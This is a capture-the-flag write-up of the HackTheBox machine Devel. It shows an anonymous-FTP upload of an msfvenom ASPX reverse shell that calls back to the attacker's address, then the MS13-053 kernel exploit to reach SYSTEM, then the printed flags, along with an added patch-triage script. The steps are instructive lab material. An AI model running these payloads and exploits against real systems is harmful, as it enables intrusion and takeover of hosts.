Devel is an easy difficulty retired machine on HackTheBox.
[RECON]
Let’s start with a simple Nmap scan as per usual.
$ nmap -A 10.10.10.5
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 08:34 BST
Nmap scan report for 10.10.10.5
Host is up (0.022s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds
The biggest thing that jumps out straight away is that anonymous FTP login is allowed: you can log in with the username ‘anonymous’ and anything as the password (the server asks for an e-mail address but does not check it). Just as telling, the three entries nmap already listed (aspnet_client, iisstart.htm, welcome.png) are exactly what a stock IIS 7 webroot contains, so the FTP root is very likely the same directory that IIS serves on port 80.
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:reece): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
[EXPLOITATION]
As you can see, the FTP listing is the IIS webroot (the same iisstart.htm and welcome.png that the default page on port 80 uses), and the aspnet_client directory tells us ASP.NET is installed. If the anonymous user can also write here, any file we upload with an .aspx extension will be compiled and executed by IIS when we request it. So the simplest way to exploit this is to use msfvenom to create a reverse TCP payload in ASPX format and upload it to the webroot over FTP.
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f aspx > shell.aspx
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
100% |********************************| 2879 31.55 MiB/s --:-- ETA
226 Transfer complete.
2879 bytes sent in 00:00 (87.41 KiB/s)
With shell.aspx sitting in the webroot, we start a Metasploit handler for the same payload on port 4444. Requesting http://10.10.10.5/shell.aspx (in a browser or with curl) makes IIS compile and run the page, and the payload connects back to the handler. LHOST has to be an address the target can reach, which here is the VPN interface (tun0), carrying the 10.10.14.13 address that msfvenom baked into the payload.
$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
Now we have a meterpreter session! However, it is running inside the IIS worker process (w3wp.exe) as the application pool identity IIS APPPOOL\Web, a low-privileged service account that cannot read other users’ profiles.
[PRIVILEGE ESCALATION]
meterpreter > cd babis
[-] stdapi_fs_chdir: Operation failed: Access is denied.
babis is a user on the box and, as you can see, we cannot enter their profile. So we need to escalate privileges, and since we already have a meterpreter session this is straightforward: background the session, then run the local exploit suggester, which goes through the local privilege escalation modules Metasploit knows about and runs each one’s check routine against the chosen session.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 167 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
Since this is an unpatched Windows 7 machine (the shell banner later shows build 6.1.7600, i.e. no service pack), there are a lot of candidates. Note the two kinds of verdict: ‘appears to be vulnerable’ means the module’s check passed, while ‘could not be validated’ only means the relevant component is present. Several of these would probably work; I chose ‘ms13_053_schlamperei’ because I have used it in CTFs in the past and it is reliable. It exploits a kernel pool overflow in win32k.sys (MS13-053): the module launches notepad.exe, reflectively injects the exploit DLL into it, and the kernel shellcode blanks the ACL of the existing winlogon.exe process (a SYSTEM process, PID 428 here; the exploit does not create it) so that any unprivileged process can open it and inject into it. That is why a plain migrate into that PID afterwards gives you a SYSTEM meterpreter. One thing to watch: the module starts its own reverse handler, so set LHOST to your VPN interface (tun0) here too, exactly as for multi/handler; otherwise the payload it injects has nowhere to connect back to.
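The suggester’s ‘appears to be vulnerable’ verdict comes from each module’s own check, and a wrong guess with a kernel exploit can blue-screen the target and cost you the only foothold you have. A cheap second opinion is to pull `systeminfo` through the session and check whether the update package for each candidate is actually missing. The script below is an added example, not part of the writeup or of Metasploit: it parses the suggester lines shown above together with a constructed `systeminfo` output for a build 7600 host, maps each module to the KB of its bulletin’s update package (only for modules from that output whose KB I am certain of; the rest are reported as unmapped rather than guessed) and ranks what is worth trying.

```python
"""
Rank local_exploit_suggester candidates against the target's patch level
before firing a kernel exploit (a failed one can blue-screen the box and
take the foothold with it).

Added example, not code from the writeup or from Metasploit.  The suggester
lines are the ones the writeup printed; the systeminfo text is constructed
for a build 6.1.7600 (Windows 7, no service pack) host like the target.
"""
import re

# Metasploit module short name -> (bulletin, KB of the fix package as it shows
# up in `systeminfo`).  Limited to modules from the writeup's output whose
# package KB is known here; anything else is reported as "unmapped", not guessed.
BULLETIN_KB = {
    "ms10_015_kitrap0d": ("MS10-015", "KB977165"),
    "ms10_092_schelevator": ("MS10-092", "KB2305420"),
    "ms13_053_schlamperei": ("MS13-053", "KB2850851"),
    "ms14_058_track_popup_menu": ("MS14-058", "KB3000061"),
    "ms15_051_client_copy_image": ("MS15-051", "KB3045171"),
    "ms16_032_secondary_logon_handle_privesc": ("MS16-032", "KB3139914"),
}
# bypassuac_eventvwr is deliberately absent: a UAC bypass needs the
# medium-integrity token of an Administrators member, and IIS APPPOOL\Web is a
# service account, so it is not a path from this foothold whatever its verdict.

SUGGESTER_RE = re.compile(r"exploit/windows/local/(\S+?):\s*(.*)$")

# Verbatim from the writeup's suggester run.
SUGGESTER_OUTPUT = """\
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
""".splitlines()

# Constructed systeminfo excerpts: an unpatched build 7600 host, and the same
# host after installing the MS13-053 and MS10-015 packages.
SYSTEMINFO_UNPATCHED = """\
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""
SYSTEMINFO_PATCHED = """\
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2850851
                           [02]: KB977165
"""


def parse_build(systeminfo):
    """(major, minor, build) from the 'OS Version:' line; 7600 = Win7 RTM, 7601 = SP1."""
    m = re.search(r"OS Version:\s*(\d+)\.(\d+)\.(\d+)", systeminfo)
    return tuple(int(x) for x in m.groups()) if m else None


def parse_hotfixes(systeminfo):
    """Set of KB identifiers listed under 'Hotfix(s):' ('N/A' yields an empty set)."""
    return set(re.findall(r"\bKB\d{6,7}\b", systeminfo))


def parse_suggester(lines):
    """Module short name -> verdict text, from local_exploit_suggester output."""
    verdicts = {}
    for line in lines:
        m = SUGGESTER_RE.search(line)
        if m:
            verdicts[m.group(1)] = m.group(2).strip()
    return verdicts


def triage(suggester_lines, systeminfo):
    """[(module, bulletin, kb, status)] ordered candidate > unverified > unmapped > patched.

    'patched' is only as good as the hotfix list: from October 2016 Windows 7
    got cumulative monthly rollups that supersede individual KBs, so on a
    rollup-patched host an absent KB proves nothing.  A build 7600 host with
    no hotfixes at all, like this one, has no such ambiguity.
    """
    installed = parse_hotfixes(systeminfo)
    rows = []
    for module, verdict in parse_suggester(suggester_lines).items():
        bulletin, kb = BULLETIN_KB.get(module, (None, None))
        if kb is None:
            status = "unmapped"
        elif kb in installed:
            status = "patched"
        elif verdict.startswith("The target appears to be vulnerable"):
            status = "candidate"
        else:
            status = "unverified"
        rows.append((module, bulletin, kb, status))
    order = {"candidate": 0, "unverified": 1, "unmapped": 2, "patched": 3}
    return sorted(rows, key=lambda r: (order[r[3]], r[0]))


if __name__ == "__main__":
    print("build:", parse_build(SYSTEMINFO_UNPATCHED))
    for module, bulletin, kb, status in triage(SUGGESTER_OUTPUT, SYSTEMINFO_UNPATCHED):
        print(f"{status:10} {module:42} {bulletin or '-':9} {kb or '-'}")
```

Run `systeminfo` from the meterpreter shell and paste its output in place of the constructed text. On a host with no hotfixes at all every mapped kernel bug is live, which matches the number of hits the suggester produced; on a newer target the rollup caveat in the docstring applies and an absent KB is not proof of a missing fix.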
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms13_053_schlamperei
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms13_053_schlamperei) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms13_053_schlamperei) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Launching notepad to host the exploit...
[+] Process 3376 launched.
[*] Reflectively injecting the exploit DLL into 3376...
[*] Injecting exploit into 3376...
[*] Found winlogon.exe with PID 428
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms13_053_schlamperei) > sessions 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID   PPID  Name               Arch  Session  User             Path
---   ----  ----               ----  -------  ----             ----
0     0     [System Process]
4     0     System
232   4     smss.exe
252   600   WmiPrvSE.exe
304   472   dllhost.exe
320   304   csrss.exe
372   364   csrss.exe
380   304   wininit.exe
428   364   winlogon.exe       x86   1                         C:\Windows\system32\winlogon.exe
472   380   services.exe
488   380   lsass.exe
496   380   lsm.exe
600   472   svchost.exe
676   472   svchost.exe
752   428   LogonUI.exe
760   472   svchost.exe
808   472   svchost.exe
852   472   svchost.exe
952   472   svchost.exe
1024  472   msdtc.exe
1048  472   svchost.exe
1152  320   conhost.exe        x86   0        IIS APPPOOL\Web  C:\Windows\system32\conhost.exe
1184  472   spoolsv.exe
1216  472   svchost.exe
1308  472   svchost.exe
1336  472   svchost.exe
1396  472   svchost.exe
1468  472   VGAuthService.exe
1544  472   vmtoolsd.exe
1600  472   svchost.exe
1908  2776  cmd.exe            x86   0        IIS APPPOOL\Web  C:\Windows\system32\cmd.exe
2468  600   WmiPrvSE.exe
2712  2776  cmd.exe            x86   0        IIS APPPOOL\Web  C:\Windows\system32\cmd.exe
2776  1600  w3wp.exe           x86   0        IIS APPPOOL\Web  c:\windows\system32\inetsrv\w3wp.exe
3028  472   sppsvc.exe
3072  472   svchost.exe
3200  320   conhost.exe        x86   0        IIS APPPOOL\Web  C:\Windows\system32\conhost.exe
3224  472   SearchIndexer.exe
meterpreter > migrate 428
[*] Migrating from 2776 to 428...
[*] Migration completed successfully.
meterpreter > shell
Process 2924 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
It worked! The shell now runs as NT AUTHORITY\SYSTEM (the Windows equivalent of root), so all that is left is to collect the two flags :).
meterpreter > cat C://Users/babis/Desktop/user.txt
9daac9a7199b30b7b9ce8b09147d2fc0
meterpreter > cat C://Users/Administrator/Desktop/root.txt
6428968eabb10759b33844ae88668ad4